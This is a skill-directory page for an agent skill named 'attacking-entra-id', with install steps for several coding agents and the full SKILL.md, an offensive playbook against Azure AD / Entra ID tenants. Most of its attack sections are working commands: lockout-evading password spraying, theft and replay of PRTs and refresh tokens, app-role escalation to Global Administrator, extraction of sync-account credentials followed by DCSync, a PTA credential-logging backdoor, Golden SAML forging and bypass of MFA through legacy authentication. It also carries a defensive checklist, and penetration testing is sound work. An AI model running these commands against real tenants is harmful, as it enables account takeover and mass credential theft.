Attack and enumerate Azure AD / Entra ID tenants — initial recon with AADInternals and ROADtools, password spraying, token theft (PRT, CAE, refresh tokens), application and service principal abuse…
Install the "attacking-entra-id" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/attacking-entra-id into .claude/skills/attacking-entra-id/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "attacking-entra-id", then confirm the skill loads.
Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
Type this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
skills CLI
$ npx skills add trilwu/secskills --skill attacking-entra-id -a codex
Project install goes to .agents/skills/; add -g for ~/.codex/skills/.
Install the "attacking-entra-id" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/attacking-entra-id into .agents/skills/attacking-entra-id/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "attacking-entra-id", then confirm the skill loads.
Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
skills CLI
$ npx skills add trilwu/secskills --skill attacking-entra-id -a cursor
Project install goes to .agents/skills/; add -g for ~/.cursor/skills/.
Install the "attacking-entra-id" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/attacking-entra-id into .cursor/skills/attacking-entra-id/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "attacking-entra-id", then confirm the skill loads.
Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
skills CLI
$ npx skills add trilwu/secskills --skill attacking-entra-id -a gemini-cli
Project install goes to .agents/skills/; add -g for ~/.gemini/skills/.
Install the "attacking-entra-id" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/attacking-entra-id into .gemini/skills/attacking-entra-id/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "attacking-entra-id", then confirm the skill loads.
Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
Installs for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
skills CLI
$ npx skills add trilwu/secskills --skill attacking-entra-id -a github-copilot
Project install goes to .agents/skills/; add -g for ~/.copilot/skills/.
Install the "attacking-entra-id" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/attacking-entra-id into .github/skills/attacking-entra-id/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "attacking-entra-id", then confirm the skill loads.
GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
skills CLI
$ npx skills add trilwu/secskills --skill attacking-entra-id -a opencode
OpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
Install the "attacking-entra-id" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/attacking-entra-id into .opencode/skills/attacking-entra-id/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "attacking-entra-id", then confirm the skill loads.
OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
Facts
Skill name
attacking-entra-id
GitHub stars
157
Token cost
~4.3k tokens
SKILL.md length
1,409 words
Files
1
Skills in repo
50
Repo updated
First seen
Licence
MIT
At a glance
Attack and enumerate Azure AD / Entra ID tenants — initial recon with AADInternals and ROADtools, password spraying, token theft (PRT, CAE, refresh tokens), application and service principal abuse…
Pentesting Entra ID tenants
SKILL.md covers When to Use, When NOT to Use, Initial Reconnaissance and Password Spraying, plus 10 more sections
Calls az, curl and python3; reaches graph.microsoft.com and login.microsoftonline.com; needs ACCESS_TOKEN
Assessing Azure AD security posture
What it does
Attacking Entra Id is an agent skill from trilwu/secskills. Attack and enumerate Azure AD / Entra ID tenants — initial recon with AADInternals and ROADtools, password spraying, token theft (PRT, CAE, refresh tokens), application and service principal abuse, Conditional Access bypass, cross-tenant pivoting, hybrid identity attacks (PTA agent, Azure AD Connect), and managed identity abuse. Use when pentesting Entra ID tenants, assessing Azure AD security posture, or exploiting cloud identity misconfigurations.
Its SKILL.md is about 4.3k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Security, covering Penetration testing. It works with Microsoft Entra ID and Microsoft Azure. The repository describes itself as: Transform Claude Code into your personal security engineer. The licence is MIT.
When your agent uses it
Pentesting Entra ID tenants
Assessing Azure AD security posture
Exploiting cloud identity misconfigurations
Example prompts
“/attacking-entra-id”
What it can do on your machine
Read from SKILL.md and the folder at commit ca53957. It shows what the files ask for, not the result of running them.
Tool permissions
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Runs code
Shell commands in SKILL.md call:
az
curl
python3
From the folder's file list and the shell code blocks in SKILL.md.
Network
Hosts in commands or code, which the agent is likely to contact:
graph.microsoft.com
login.microsoftonline.com
login.microsoft.com
outlook.office365.com
Also links to:
attack.mitre.org
From URLs in SKILL.md, links to its own repository left out.
Credentials
Names these keys or tokens, usually read from environment variables:
ACCESS_TOKEN
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Context cost
Attacking Entra Id loads about 4.3k tokens when it runs. Until then it costs about 118 tokens; SKILL.md has 1,409 words of instructions outside code blocks.
Always· name and description, kept in context so the agent knows when to use it
~118
When it runs· the whole SKILL.md, loaded when a task matches
~4.3k
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
Safety
Auto-check passed
The automated check found no risky patterns in SKILL.md.
Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
Download SKILL.mdSave it as .claude/skills/attacking-entra-id/SKILL.md (or your agent's skills folder).
name
attacking-entra-id
description
Attack and enumerate Azure AD / Entra ID tenants — initial recon with AADInternals and ROADtools, password spraying, token theft (PRT, CAE, refresh tokens), application and service principal abuse, Conditional Access bypass, cross-tenant pivoting, hybrid identity attacks (PTA agent, Azure AD Connect), and managed identity abuse. Use when pentesting Entra ID tenants, assessing Azure AD security posture, or exploiting cloud identity misconfigurations.
verified
2026-07-27
Attacking Entra ID
Entra ID (formerly Azure AD) is the identity control plane for Microsoft 365,
Azure, and thousands of SaaS integrations. Compromising it grants access to
everything those identities protect: mailboxes, SharePoint, Azure
subscriptions, and any application that trusts the tenant. Despite this, Entra
ID environments are routinely less monitored than on-premises Active Directory.
Most organizations lack equivalent detection coverage for cloud identity
attacks, and the attack surface -- OAuth tokens, application consent, service
principals, Conditional Access gaps -- is fundamentally different from
traditional AD.
Only against tenants you are authorized to test.
When to Use
Entra ID tenant reconnaissance and enumeration
Password spraying against Microsoft 365 / Azure AD endpoints
Stealing or replaying OAuth tokens, refresh tokens, and PRTs
Abusing application registrations, service principals, and consent grants
Bypassing Conditional Access policies
Hybrid identity attacks (Azure AD Connect, PTA agents)
When NOT to Use
On-premises Active Directory attacks (Kerberoasting, DCSync, lateral
movement) -- use attacking-active-directory
General AWS/Azure/GCP infrastructure (VMs, storage, IAM roles) -- use
exploiting-cloud-platforms
AD CS certificate abuse -- use abusing-adcs
Detecting these attacks defensively -- use engineering-detections
Initial Reconnaissance
Tenant discovery requires no credentials. Start here to confirm the target
tenant exists, identify federation configuration, and map the attack surface.
bash
# AADInternals -- tenant recon
Import-Module AADInternals
Invoke-AADIntReconAsOutsider -DomainName target.com
# Get tenant ID from OpenID configuration
curl https://login.microsoftonline.com/target.com/.well-known/openid-configuration
# Check user realm (managed vs. federated)
curl "https://login.microsoftonline.com/common/userrealm/user@target.com?api-version=2.0"
# ROADtools -- authenticated enumeration (once you have creds)
roadrecon auth -u user@target.com -p 'Password'
roadrecon gather
roadrecon gui
# Browse the GUI: users, groups, applications, service principals, conditional access
# AzureHound -- BloodHound collection for Azure/Entra
azurehound -u user@target.com -p 'Password' list --tenant target.com -o output.json
ROADtools GUI is the single most useful view of a tenant. Run roadrecon gather immediately after obtaining any valid credential.
Password Spraying
Microsoft rate-limits and logs sprays, so cadence matters. One password per
user per 30-60 minutes avoids smart lockout in most configurations.
Avoid the user's previous password (it triggers a different log event)
Monitor for AADSTS50053 (locked) and AADSTS50126 (invalid password) to
distinguish lockout from failure
Token Theft and Replay
Entra ID authentication produces several token types. Each has different
lifetimes, scopes, and replay conditions.
Primary Refresh Token (PRT)
The PRT is a long-lived credential cached on Azure AD joined or registered
devices. It grants SSO to all Microsoft cloud services.
powershell
# Extract PRT using ROADtoken (requires SYSTEM or user session)
ROADtoken.exe
# RequestAADRefreshToken -- request a refresh token using the PRT
RequestAADRefreshToken.exe
# AADInternals -- export PRT from a joined device
$prt = Get-AADIntUserPRTToken
# Use it in a browser by injecting the x-ms-RefreshTokenCredential cookie
A stolen PRT bypasses MFA if MFA was satisfied when the PRT was issued, because
the PRT carries the MFA claim.
Refresh Token Replay
bash
# Exchange a refresh token for an access token
curl -X POST https://login.microsoftonline.com/TENANT_ID/oauth2/v2.0/token \
-d "client_id=CLIENT_ID&grant_type=refresh_token&refresh_token=STOLEN_RT&scope=https://graph.microsoft.com/.default"
# ROADtools -- authenticate with a refresh token
roadrecon auth --refresh-token 'eyJ0...'
roadrecon gather
Continuous Access Evaluation (CAE) Gaps
CAE-aware tokens are checked against revocation in near real-time, but not all
applications support CAE. Token lifetime for non-CAE resources remains up to 1
hour. Critical event evaluation (user disabled, password change) propagates
within minutes, but IP-based evaluation covers only supported workloads. Check
whether the target application enforces CAE before assuming token revocation is
instantaneous.
Application and Service Principal Abuse
Applications and service principals are the most under-reviewed attack surface
in Entra ID. They persist through user offboarding, hold credentials that
nobody rotates, and often have excessive API permissions.
Dangerous Application Permissions
Application (not delegated) permissions that grant tenant-wide access without
user consent:
Mail.Read / Mail.ReadWrite -- read all mailboxes in the tenant
RoleManagement.ReadWrite.Directory -- assign any directory role, including
Global Administrator
AppRoleAssignment.ReadWrite.All -- grant any app role to any principal
Application.ReadWrite.All -- modify any application registration
Directory.ReadWrite.All -- broad write across directory objects
bash
# Enumerate applications with high-privilege permissions (Graph API)
az rest --method GET --url "https://graph.microsoft.com/v1.0/servicePrincipals?\$select=displayName,appId,appRoles" \
--query "value[].{name:displayName,appId:appId}"
# ROADtools -- the GUI shows app permissions under each service principal
# Find apps with credentials (secrets/certificates)
az ad app list --query "[?passwordCredentials || keyCredentials].{name:displayName,appId:appId}" -o table
Consent Grant Abuse (Illicit Consent Grant)
If users can consent to applications, an attacker can register a malicious
multi-tenant app requesting Mail.Read and similar scopes, then phish a user
into granting consent.
powershell
# Microsoft Graph PowerShell. The AzureAD and MSOnline modules are gone --
# deprecated March 2024, unsupported after 30 March 2025, retired from
# July 2025 -- so any Get-AzureAD*/Get-Msol* command you find in older
# tradecraft will simply fail to authenticate.
Connect-MgGraph -Scopes 'Policy.Read.All','Application.Read.All'
# Check whether user consent is allowed
(Get-MgPolicyAuthorizationPolicy).DefaultUserRolePermissions.PermissionGrantPoliciesAssigned
# If "ManagePermissionGrantsForSelf.microsoft-user-default-legacy" is present,
# users can consent to third-party apps
# Enumerate existing consent grants
Get-MgOauth2PermissionGrant -All
App Role Assignment Escalation
If you control a service principal with AppRoleAssignment.ReadWrite.All:
bash
# Grant RoleManagement.ReadWrite.Directory to your controlled SP
az rest --method POST \
--url "https://graph.microsoft.com/v1.0/servicePrincipals/SP_OBJECT_ID/appRoleAssignments" \
--body '{"principalId":"SP_OBJECT_ID","resourceId":"GRAPH_SP_ID","appRoleId":"ROLE_MANAGEMENT_ROLE_ID"}'
# Then assign Global Administrator to any user or SP
Conditional Access Bypass
Conditional Access (CA) policies are the primary security control in Entra ID,
but gaps are common.
Common bypass patterns:
Legacy authentication protocols -- CA policies that do not block legacy
auth allow password-only authentication via IMAP/POP/SMTP
Device compliance gaps -- policies requiring compliant devices often
exclude service accounts or break-glass accounts
Named location trust -- if the policy trusts certain IP ranges, an
attacker on those networks (VPN, compromised on-prem host) bypasses MFA
Platform exclusions -- policies scoped to Windows/macOS may not apply to
Linux or mobile
Application exclusions -- not all applications are covered; check
Microsoft Admin portals, Azure Management, and Graph API specifically
CAE vs. non-CAE resources -- revocation signals do not reach non-CAE
applications in real time
bash
# Enumerate CA policies (requires Policy.Read.All or equivalent)
az rest --method GET --url "https://graph.microsoft.com/v1.0/identity/conditionalAccessPolicies"
# ROADtools -- CA policies are visible in the GUI after gathering
# Test legacy auth (if not blocked)
curl -u user@target.com:password https://outlook.office365.com/EWS/Exchange.asmx
Cross-Tenant Attacks
B2B Guest Pivoting
Guest accounts in one tenant often have access to resources in the inviting
tenant. If you compromise a user who is a guest in another tenant, enumerate
what that guest can reach.
bash
# List tenants the compromised user is a guest in
az account list --all --query "[].{tenant:tenantId,name:name}"
# Switch context to the target tenant
az login --tenant TARGET_TENANT_ID
# Enumerate accessible resources in the target tenant
az ad signed-in-user show
az group list
Tenant-to-Tenant Trust Abuse
Cross-tenant access settings and cross-tenant synchronization can create trust
paths:
Inbound trust allowing MFA claims from the source tenant -- compromising a
user in the source tenant gives MFA-bypassed access to the target
Cross-tenant sync pushing identities into the target -- if you control the
source tenant's sync, you can inject accounts into the target
Hybrid environments connect on-premises AD to Entra ID, creating attack paths
in both directions.
Azure AD Connect -- Sync Account DCSync
Azure AD Connect uses a service account with Directory Replication permissions
(DCSync rights) in on-premises AD. The credentials are stored encrypted on the
Connect server.
powershell
# AADInternals -- extract the sync account credentials from the Connect server
# Requires local admin on the Azure AD Connect host
Import-Module AADInternals
Get-AADIntSyncCredentials
# Returns: username (MSOL_xxxx or custom), password, tenant ID
# Use the sync account to DCSync on-prem AD
secretsdump.py 'MSOL_abc123:password@dc.domain.local' -just-dc
Compromising the Azure AD Connect server is a domain compromise. The sync
account also has the ability to reset cloud passwords unless password writeback
scope is restricted.
Pass-Through Authentication (PTA) Agent Abuse
PTA agents validate on-prem passwords for cloud logins. An attacker with admin
access on the PTA agent host can intercept credentials in cleartext.
powershell
# AADInternals -- install a PTA agent backdoor that logs credentials
# and optionally accepts any password
Install-AADIntPTASpy
# Retrieve intercepted credentials
Get-AADIntPTASpyLog
# Remove the spy
Remove-AADIntPTASpy
Compromising any PTA agent host gives cleartext credentials for every cloud
authentication by non-synced-hash users.
Show full SKILL.md (550 more words)Show less
Federation Abuse (Golden SAML)
If ADFS is in use and you have the token-signing certificate:
bash
# Export the ADFS token-signing certificate (requires DA or local admin on ADFS)
# Then forge SAML tokens for any federated user
# AADInternals:
$cert = Export-AADIntADFSSigningCertificate
Open-AADIntOffice365Portal -ImmutableID USER_IMMUTABLE_ID -Issuer FEDERATION_ISSUER -PfxFileName cert.pfx
Managed Identity and Workload Identity Federation
Managed Identity Abuse
Azure managed identities (system-assigned and user-assigned) are service
principals that Azure resources use to authenticate to other services.
bash
# From a compromised Azure VM/Function/App Service -- request a token
curl -H Metadata:true \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com"
# Use the token against Graph API
curl -H "Authorization: Bearer ACCESS_TOKEN" https://graph.microsoft.com/v1.0/me
If the managed identity has high-privilege Graph or ARM permissions, this is
equivalent to a service principal compromise.
Workload Identity Federation
Workload identity federation allows external identity providers (GitHub
Actions, GCP, AWS) to authenticate as an Entra ID service principal without
secrets.
Misconfiguration risk: overly broad subject/issuer conditions. If a federated
credential trusts repo:org/* instead of repo:org/specific-repo:ref:refs/heads/main,
any repo in the org can assume the identity.
bash
# Enumerate federated credentials on an application
az ad app federated-credential list --id APP_OBJECT_ID
Defensive Review Checklist
When performing a security assessment rather than an attack:
Are legacy authentication protocols blocked in all CA policies?
Which applications have application-level (not delegated) permissions to
Graph API, and when were their credentials last rotated?
Can users consent to third-party applications, or is admin consent required?
Are all CA policies applied to all cloud apps, or do exclusions exist?
Is PRT protection (token binding to TPM) enforced on joined devices?
Are break-glass accounts scoped and monitored?
Is the Azure AD Connect server hardened and monitored as a Tier 0 asset?
Are PTA agent hosts hardened equivalently to domain controllers?
Are cross-tenant access policies scoped to specific partners, or wide open?
Are workload identity federation subject conditions narrowly scoped?
Is sign-in and audit log retention configured beyond the 7-day default?
Rationalizations to Reject
"We have Conditional Access, so MFA is everywhere." Check for legacy auth
exclusions, platform gaps, and application exclusions. CA only works when it
covers every path.
"The app only has delegated permissions, not application permissions."
Delegated permissions exercised by an admin-consented app with a valid token
still operate at the user's full privilege level.
"We rotate user passwords regularly." Stolen PRTs and refresh tokens survive
password rotation unless the sessions are explicitly revoked.
"The service principal has no interactive login." It does not need one. A
leaked client secret with Mail.Read application permission reads every
mailbox in the tenant silently.
"Our Azure AD Connect server is on the domain, so it's already secured."
It holds DCSync-capable credentials and should be treated as Tier 0 --
equivalent to a domain controller.
"We only allow B2B guests from trusted partners." If the partner tenant is
compromised, inbound trust policies may let the attacker inherit MFA claims
and access your resources without re-authenticating.
"Managed identities are more secure because there are no secrets to leak."
True for credential theft, but any code running on the resource can request
tokens. Overly permissioned managed identities are still a privilege
escalation path.
<!-- attack:start -->
ATT&CK Coverage
Generated from secskills-core/ttp-index.json — edit that file, then run
python3 scripts/sync_attack.py --write. Re-verify IDs against the
current ATT&CK release before citing them in a report.
Initial Access (TA0001)
T1078.004 Cloud Accounts (also Persistence) — see also exploiting-cloud-platforms
T1199 Trusted Relationship — see also exploiting-cloud-platforms, abusing-ci-cd-oidc
Credential Access (TA0006)
T1528 Steal Application Access Token — see also testing-apis, exploiting-cloud-platforms, attacking-oauth-oidc
Attacking Entra Id next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
Detect Azure service principal abuse in Microsoft Entra ID using KQL detection queries (Sentinel/Splunk) against Azure AD Audit and Sign-in Logs, covering added credentials, privileged role…
Detect lateral movement in Azure AD/Entra ID environments using Microsoft Graph API audit logs, Azure Sentinel KQL hunting queries, and sign-in anomaly correlation to identify privilege escalation…
Guidance for Microsoft Entra ID Governance — automating identity lifecycle and access with entitlement management (access packages), access reviews, lifecycle workflows for joiner-mover-leaver…
Assess and harden LLM applications and agentic systems against prompt injection, tool misuse, excessive agency, memory poisoning, RAG data leakage, and model supply-chain risk, mapped to the OWASP…
Reverse engineer Go binaries by recovering function names and types from pclntab and moduledata using GoReSym, redress, and IDA/Ghidra Go plugins, and by reading Go's non-standard calling…
Analyze iOS applications at the binary level — decrypting FairPlay-protected IPAs with frida-ios-dump or bagbak, inspecting Mach-O load commands, recovering Objective-C headers with class-dump, and…
Attack and enumerate Azure AD / Entra ID tenants — initial recon with AADInternals and ROADtools, password spraying, token theft (PRT, CAE, refresh tokens), application and service principal abuse…. Attacking Entra Id is an agent skill from trilwu/secskills. Attack and enumerate Azure AD / Entra ID tenants — initial recon with AADInternals and ROADtools, password spraying, token theft (PRT, CAE, refresh tokens), application and service principal abuse, Conditional Access bypass, cross-tenant pivoting, hybrid identity attacks (PTA agent, Azure AD Connect), and managed identity abuse.
When should I use Attacking Entra Id?
Attacking Entra Id fits situations like: pentesting Entra ID tenants; assessing Azure AD security posture; exploiting cloud identity misconfigurations.
How do I install Attacking Entra Id in Claude Code?
Run `npx skills add trilwu/secskills --skill attacking-entra-id -a claude-code`. Or copy the skill folder (secskills-offense/skills/attacking-entra-id in trilwu/secskills) into .claude/skills/attacking-entra-id in your project. Claude Code loads it when a task matches its description.
How do I install Attacking Entra Id in Codex?
Run `npx skills add trilwu/secskills --skill attacking-entra-id -a codex`. Or copy the skill folder (secskills-offense/skills/attacking-entra-id in trilwu/secskills) into .agents/skills/attacking-entra-id in your project. Codex loads it when a task matches its description.
Can I use Attacking Entra Id in Cursor, Gemini CLI or GitHub Copilot?
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add trilwu/secskills --skill attacking-entra-id -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/attacking-entra-id, .gemini/skills/attacking-entra-id, .github/skills/attacking-entra-id and .opencode/skills/attacking-entra-id in your project.
What does Attacking Entra Id need to run?
Going by SKILL.md and its folder, Attacking Entra Id needs the command-line tools its instructions call (az, curl and python3) and credentials named ACCESS_TOKEN.
Does Attacking Entra Id access the network?
SKILL.md names 5 domains. In commands or code: graph.microsoft.com, login.microsoftonline.com, login.microsoft.com and outlook.office365.com; the agent is likely to contact these when it follows the instructions. As links in the text: attack.mitre.org. This is read from the text; nothing was executed.
Is Attacking Entra Id safe to install?
Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.
What licence does Attacking Entra Id use?
Attacking Entra Id is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
How many tokens does Attacking Entra Id use?
About 4.3k tokens (SKILL.md is roughly 17k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
What are the alternatives to Attacking Entra Id?
Skills that share tags, products or a category with Attacking Entra Id: Detecting Azure Service Principal Abuse (mukul975/Anthropic-Cybersecurity-Skills, 34k stars), Implementing Azure Ad Privileged Identity Management (mukul975/Anthropic-Cybersecurity-Skills, 34k stars), Implementing Cloud Waf Rules (mukul975/Anthropic-Cybersecurity-Skills, 34k stars) and Azure Pim (vinayaklatthe/microsoft-security-skills, 175 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
Who maintains Attacking Entra Id?
trilwu (a GitHub user) maintains it in trilwu/secskills, which has 157 GitHub stars. The repository holds 50 skills in this directory. The repository was last updated on September 4, 2026.
Source: trilwu/secskills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.